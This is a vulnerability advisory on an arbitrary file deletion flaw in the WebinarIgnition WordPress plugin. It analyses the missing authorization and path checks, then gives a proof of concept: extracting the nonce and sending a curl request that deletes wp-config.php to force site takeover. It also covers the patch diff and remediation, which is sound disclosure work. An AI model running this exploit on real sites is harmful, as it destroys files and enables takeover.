CVE-2026-42757: WebinarIgnition Arbitrary File Deletion (CVSS 8.1)
Table of Contents
CVE-2026-42757 is a CVSS 8.1 High Arbitrary File Deletion vulnerability in the WebinarIgnition – Live, Automated & Evergreen Webinar System also for WooCommerce WordPress plugin. An authenticated attacker with only Subscriber-level access can delete any file on the server. Deleting a critical file such as wp-config.php forces WordPress into installation mode, enabling a complete site takeover.
Vulnerability Summary
| Field | Value |
|---|---|
| Plugin Name | WebinarIgnition – Live, Automated & Evergreen Webinar System also for WooCommerce |
| Plugin Slug | webinar-ignition |
| CVE ID | CVE-2026-42757 |
| CVSS Score | 8.1 (High) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H |
| Vulnerability Type | Authenticated (Subscriber+) Arbitrary File Deletion |
| Affected Versions | < 4.08.253 |
| Patched Version | 4.08.253 |
| Published | May 30, 2026 |
| Researcher | hhhai |
| Wordfence Advisory | Link |
Description
The WebinarIgnition plugin is vulnerable to arbitrary file deletion due to insufficient file path validation in its CSV import feature. An authenticated attacker with Subscriber-level access can supply any file path as the file parameter in an AJAX request. The server reads the file and then deletes it without checking that the path stays within the uploads directory. This can easily lead to remote code execution when critical files like wp-config.php are deleted, forcing WordPress back into setup mode.
Technical Analysis
Vulnerable AJAX Endpoint
The plugin registers two AJAX actions for its CSV import feature in inc/callback.php:
// Step 1: Upload and preview a CSV file
add_action( 'wp_ajax_reh_wi_handle_csv_preview', 'reh_wi_handle_csv_preview_callback' );
// Step 2: Map columns and import the CSV — vulnerable function
add_action( 'wp_ajax_reh_wi_handle_csv_upload_mapped', 'webinarignition_reh_wi_handle_csv_upload_mapped_callback' );
Both actions use only the wp_ajax_ prefix (not wp_ajax_nopriv_), so WordPress requires the caller to be logged in. However, neither action checks the caller’s role or capabilities.
Missing Authorization Check
The webinarignition_reh_wi_handle_csv_upload_mapped_callback() function only verifies a nonce. It has no current_user_can() call:
// inc/callback.php (line 3087)
function webinarignition_reh_wi_handle_csv_upload_mapped_callback() {
if ( !wp_verify_nonce( sanitize_text_field( $_POST['security'] ?? '' ), 'webinarignition_ajax_nonce' ) ) {
wp_send_json_error( 'Invalid security token' );
}
// No capability check here — any logged-in user continues past this point
$app_id = (int) sanitize_text_field( $_POST['id'] );
$webinar_data = WebinarignitionManager::webinarignition_get_webinar_data( $app_id );
// ...
$target_path = sanitize_text_field( $_POST['file'] ?? '' ); // user-controlled path
sanitize_text_field() strips HTML and extra whitespace but does not restrict file paths. An attacker can pass /var/www/html/wp-config.php and it passes this check unchanged.
Nonce Accessible to Any Subscriber
A nonce check only prevents CSRF — it does not confirm who the logged-in user is. Because the nonce webinarignition_ajax_nonce is embedded in every webinar registration page, any logged-in subscriber can read it from the page source:
// inc/class.WebinarignitionPowerupsShortcodes.php (line 745)
$window_security = "window.wiRegJS.ajax_nonce = '" . wp_create_nonce( 'webinarignition_ajax_nonce' ) . "'";
// And also via wp_localize_script (line 757)
wp_localize_script( 'webinarignition_registration_js', 'wiRegJS', array(
'ajax_nonce' => wp_create_nonce( 'webinarignition_ajax_nonce' ),
) );
Any subscriber who visits a webinar registration page while logged in can open the browser console and type wiRegJS.ajax_nonce to retrieve a valid nonce.
Unvalidated File Deletion
After reading and processing the file as CSV, the function deletes the file at the caller-supplied path:
// inc/callback.php (line 3174)
if ( file_exists( $target_path ) ) {
wp_delete_file( $target_path );
}
wp_send_json_success( [
'data' => $csv_array,
] );
There is no check that $target_path is inside the uploads directory or that the file extension is .csv. Any readable file the web server process owns can be deleted.
Execution Path Summary
- Attacker logs in as a Subscriber
- Visits any page containing the
[wi_webinar_block]shortcode - Reads
wiRegJS.ajax_noncefrom the browser console (or page source) - Sends a POST request to
wp-admin/admin-ajax.phpwithaction=reh_wi_handle_csv_upload_mapped, the nonce, a valid webinar ID, andfile=/absolute/path/to/target - The server reads the file, processes it as CSV, and then deletes it
Proof of Concept
Disclaimer: This proof of concept is provided for educational purposes only. Test only on systems you own or have explicit written permission to test.
Prerequisites:
- WordPress site running WebinarIgnition version < 4.08.253
- Attacker has a Subscriber-level account (or user registration is open)
- At least one webinar exists (to obtain a valid webinar ID)
- A page with the
[wi_webinar_block]shortcode is publicly accessible
Step 1 — Obtain the nonce
Log in as a Subscriber. Visit any webinar registration page. Open the browser console and run:
console.log(wiRegJS.ajax_nonce);
Copy the nonce value (a 10-character alphanumeric string).
Step 2 — Find a valid webinar ID
The webinar ID appears in the shortcode (id attribute) or in the URL of the webinar admin page. For example, if the admin URL includes post=42, the webinar ID is 42.
Step 3 — Delete an arbitrary file
Replace <TARGET>, <NONCE>, <WEBINAR_ID>, and the cookie with your values:
curl -s -X POST "https://<TARGET>/wp-admin/admin-ajax.php" \
--cookie "wordpress_logged_in_XXXX=<SUBSCRIBER_SESSION_COOKIE>" \
--data-urlencode "action=reh_wi_handle_csv_upload_mapped" \
--data-urlencode "security=<NONCE>" \
--data-urlencode "id=<WEBINAR_ID>" \
--data-urlencode "file=/var/www/html/wp-config.php" \
--data-urlencode "mapping[email]=email"
A successful response looks like:
{"success":true,"data":{"data":[]}}
Step 4 — Verify the deletion
curl -s "https://<TARGET>/" | grep -i "error establishing\|WordPress › Installation"
If wp-config.php was deleted, WordPress displays a database error or the installation wizard, allowing an attacker to reconfigure the database and take full control.
Patch Analysis
Version 4.08.253 introduced two new helper functions in inc/callback.php:
+function webinarignition_reh_wi_current_user_can_import_csv() {
+ return current_user_can( 'manage_options' );
+}
+
+function webinarignition_reh_wi_validate_csv_import_file_path( $target_path ) {
+ if ( empty( $target_path ) ) {
+ return false;
+ }
+ $real_target_path = realpath( $target_path );
+ if ( false === $real_target_path || !is_file( $real_target_path ) ) {
+ return false;
+ }
+ $uploads = wp_upload_dir();
+ $real_upload_base = realpath( $uploads['basedir'] );
+ $normalized_target = wp_normalize_path( $real_target_path );
+ $normalized_base = trailingslashit( wp_normalize_path( $real_upload_base ) );
+ if ( 0 !== strpos( $normalized_target, $normalized_base ) ) {
+ return false;
+ }
+ if ( 'csv' !== strtolower( pathinfo( $normalized_target, PATHINFO_EXTENSION ) ) ) {
+ return false;
+ }
+ return $normalized_target;
+}
Both AJAX handlers now call these functions immediately after the nonce check:
function webinarignition_reh_wi_handle_csv_upload_mapped_callback() {
if ( !wp_verify_nonce( ... ) ) { wp_send_json_error( ... ); }
+ if ( !webinarignition_reh_wi_current_user_can_import_csv() ) {
+ wp_send_json_error( [ 'message' => 'Insufficient permissions.' ], 403 );
+ }
// ...
- $target_path = sanitize_text_field( $_POST['file'] ?? '' );
+ $target_path = webinarignition_reh_wi_validate_csv_import_file_path(
+ sanitize_text_field( wp_unslash( $_POST['file'] ?? '' ) )
+ );
+ if ( empty( $target_path ) ) {
+ wp_send_json_error( [ 'message' => 'Invalid CSV file path.' ], 400 );
+ }
The fix addresses the root cause in two ways:
- Authorization: Only users with
manage_options(Administrators) can call the CSV import endpoint. - Path validation:
realpath()resolves symlinks, then the code checks that the resolved path starts with the WordPress uploads base directory and ends with a.csvextension. This prevents path traversal attacks.
Timeline
| Date | Event |
|---|---|
| May 30, 2026 | Vulnerability published; patch released (version 4.08.253) |
| June 2, 2026 | Wordfence advisory last updated |
| June 7, 2026 | This blog post published |
Remediation
Update WebinarIgnition to version 4.08.253 or later from the WordPress admin dashboard under Plugins → Installed Plugins, or download directly from wordpress.org.
If an immediate update is not possible:
- Restrict file system write permissions so the web server process cannot delete critical WordPress files
- Disable user registration to prevent new subscriber accounts until the patch is applied